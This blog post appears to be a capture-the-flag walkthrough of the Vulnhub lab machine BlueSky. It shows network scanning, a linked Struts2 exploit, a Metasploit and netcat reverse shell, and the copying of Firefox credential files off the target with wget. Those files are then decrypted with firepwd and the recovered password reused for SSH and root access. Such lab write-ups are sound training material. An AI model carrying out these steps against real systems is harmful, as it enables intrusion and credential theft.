NepCodeX

Byte Musings: Where Tech Meets Curiosity


BlueSky Walkthrough – Vulnhub – Writeup

bluesky walkthrough vulnhub writeup

BlueSky is an easy machine from Vulnhub that requires a bit of initial enumeration. However, upon getting the foothold, this machine isn’t that difficult. Also, this machine worked in VMWare but not in VirtualBox for me. I have taken the reference from Proxy Programmer’s video for the foothold. You can check it at the end of this blog post. “BlueSky Walkthrough – Vulnhub – Writeup”

Link to the machine: https://www.vulnhub.com/entry/bluesky-1,623/

System Failure Walkthrough – Vulnhub – Writeup

Identify the target

First of all, we have to identify the IP address of the target machine while working with the virtual environments.

sudo netdiscover -r 192.168.19.0/24
image 288
Target IP address: 192.168.19.147

Scan open ports

Next, we have to look for the open ports on the target. This gives us information about the open ports on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 192.168.19.147
image 289
Nmap scan results

We can see from the screenshot above that we have an Apache Tomcat server running on the target.

Enumerate tomcat server

This is the part that I really couldn’t get anything from the tomcat server. However, from the Proxy Programmer’s video, I get that we need to guess related frameworks. Also, when I searched tomcat on Metasploit, I got a result struts which is a framework for Java EE. With the help of Proxy Programmer’s video, I identified that the vulnerability is on the struts2 framework.

Github Link: https://github.com/jrrdev/cve-2017-5638/blob/master/exploit/exploit.py

The above exploit works on python2 only. However, I will be using the Metasploit framework for getting a reverse shell.

image 290
msfconsole command history

Although it said that the exploit failed, we have a session running in the background.

image 291
Session in background

Since we have a session in the background, I decided to spawn another reverse shell in my bash as Metasploit shells aren’t as stable.

nc -nlvp 9001
image 292
Spawned a reverse shell from Metasploit
image 293
Got a reverse shell

Escalate privileges

Next, I upgraded the reverse shell. For more information, check my other blog post.

Upgrade to an intelligent reverse shell

image 294
.mozilla directory
image 295
key4.db and logins.json

Since we have key4.db and logins.json files, we can decrypt the password using firepwd tool. For that, we have to transfer these two files to my local machine.

# On the target machine
python3 -m http.server
# On my local machine
wget http://192.168.19.147:8000/key4.db
wget http://192.168.19.147:8000/logins.json

Github link to Firepwd: https://github.com/lclevy/firepwd

We have to install the required packages and then put these two files on the same directory where firepwd.py resides.

python3 firepwd.py

We got a twitter’s password.

image 296
Twitter password

Then, when I checked for password reuse by logging into the SSH service, it worked.

image 297
SSH Login

Now, let’s check the sudo permissions.

image 298
sudo permissions

We can see that the user has all permissions and we can now switch to root.

image 299
Root access

Walkthrough by Proxy Programmer

Walkthrough of Proxy Programmer


0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments